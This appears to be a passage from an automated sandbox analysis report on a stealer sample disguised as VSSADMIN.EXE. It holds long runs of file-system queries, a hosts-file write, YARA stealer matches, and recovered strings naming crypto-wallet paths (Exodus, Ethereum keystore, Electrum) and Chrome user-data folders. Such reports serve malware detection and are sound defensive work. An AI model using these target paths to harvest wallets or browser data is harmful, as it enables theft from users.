              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\Desktop\VSSADMIN.EXE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: 0_2_00007FF614C989E0 cpuid 0_2_00007FF614C989E0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: 0_2_00007FF614C7B5B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF614C7B5B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: 0_2_00007FF614C94E50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF614C94E50
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: 59_2_00007FF6EE7748CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,59_2_00007FF6EE7748CC

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File written: C:\Windows\System32\drivers\etc\hosts

              Stealing of Sensitive Information

              Source: Yara match File source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: VSSADMIN.EXE.exe PID: 6856, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, type: DROPPED
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
